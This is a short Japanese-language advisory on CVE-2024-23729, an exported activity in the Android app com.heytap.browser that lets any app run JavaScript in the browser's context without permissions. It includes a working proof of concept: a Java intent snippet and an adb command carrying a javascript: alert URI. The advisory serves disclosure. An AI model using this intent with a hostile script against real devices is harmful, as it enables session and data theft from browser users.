
CVE-2024-23729
Androidプラットフォーム上の com.heytap.browser アプリケーションに脆弱性が発見されました。この脆弱性により、攻撃者は権限を一切必要とせずに、アプリケーションのコンテキスト内で任意のJavaScriptコードを実行できます。
com.heytap.browsercom.heytap.browser アプリの com.android.browser.RealBrowserActivity アクティビティはエクスポートされており、権限を必要とせずに任意のサードパーティアプリケーションから呼び出すことができます。悪意のあるアプリはこれを悪用して、`com.heytap.browser`` アプリのコンテキスト内で任意のJavaScriptコードを実行できます。
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

悪用に成功すると、攻撃者は以下を実行できます:
com.heytap.browser アプリのコンテキスト内で任意のJavaScriptコードを実行する。